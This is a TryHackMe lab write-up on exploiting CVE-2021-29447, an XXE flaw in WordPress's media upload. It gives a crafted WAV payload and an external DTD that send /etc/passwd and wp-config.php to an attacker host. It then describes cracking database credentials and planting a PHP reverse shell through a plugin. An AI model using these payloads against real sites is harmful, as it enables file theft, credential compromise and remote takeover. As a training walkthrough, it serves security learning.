TryHackMe walkthrough — Wordpress: CVE-2021–29447
Overview:
A new vulnerability has been identified in Worpress version 5.6.0 to 5.7.0 running on PHP 8 by researchers at SonarSource. This is an XXE (External XML Entities) exploit taking advantage of the XML Interpreter’s poor configuration.
A user with the ability to upload files can exploit an XML parsing issue in the Media Library leading to XXE attacks. WordPress uses the ID3 library to parse information and metadata of an audio file uploaded in the Media Library of the web application server. That library was found to be vulnerable to the XML External Entity attack. We’ll understand this vulnerability further as we walk through this lab.
Exploitation:
Let’s start the lab and run wpscan on target to know about the version. I like to initially run my wpscan with below options:
wpscan — url <IP> -e p,t,u
We can see the WordPress version is 5.6.2 which is vulnerable.
We’ve been also provided with a user credentials test-corp:test so we can login and check with this creds.
Now, since the vulnerability involves uploading a malicious media file, our next step is to create a malicious wave file (.wav). However, the result of parsed iXML metadata is not sent back to the user, so to exploit it we need a blind XXE payload. This is doable by including an external Document Type Definition controlled by the attacker.
A DTD defines the document structure with a list of validated elements and attributes. A DTD can be declared inline inside an XML document, or as an external reference.
The command for this is given below:
echo -en ‘RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version=”1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM ‘“‘“‘http://YOURSEVERIP:PORT/NAMEEVIL.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
As you can see, the XML document above includes an external DTD at ‘http://YOURSEVERIP:PORT/NAMEEVIL.dtd’.
Now we will include malicious XML with external entity in the same NAMEEVIL.dtd file with below code.
<!ENTITY % file SYSTEM “php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd”>
<!ENTITY % init “<!ENTITY % trick SYSTEM ‘http://YOURSERVERIP:PORT/?p=%file;'>" >
Next step is to start an http server at same place where this .dtd file is saved and upload the .wav file.
As soon as we start the http server and upload .wav file, we can see above request on our http server.
Note, in order to exfiltrate data effectively we’ve used Zlib for encoding. To decode this we will use below code:
<?php echo zlib_decode(base64_decode(‘base64here’)); ?>
On decoding, we can see the /etc/passwd file content.
Getting the configuration file
Now that we have arbitrary file access, we can try grab wp-config.php. Usually, WordPress root installation is found in /var/www/html path hence, we will update our NAMEEVIL.dtd to find /var/www/html/wp-config.php.
Once again, we will upload the same .wav file and check the request log:
Decoding it gives us the config file containing MySQL credentials:
Once we have got credentials, we can login to MySQL with same creds and check database.
Inside the database mentioned in config file, we can extract the credentials.
In order to crack the credentials, I used John.
Once this is done next few steps are simple. We just need to login as this user and upload php reverse shell. We can use PentestMonkeys classic php reverse-shell to gain access onto the machine.
I decided to edit a plugin hello.php for my reverse shell. After doing changes in plugin from plugin editor, access the reverse shell from below path:
https://<IP>/wp-content/plugins/hello.php
You can grab the flag at the only users home directory ;)
Conclusion:
This was a really cool vulnerability identified by SonarSource and nice room by TryHackMe to explain the concept. As of the remediation, this has been fixed in WorPress version 5.7.1 and above.
That’s all for this blog, see you all again soon..
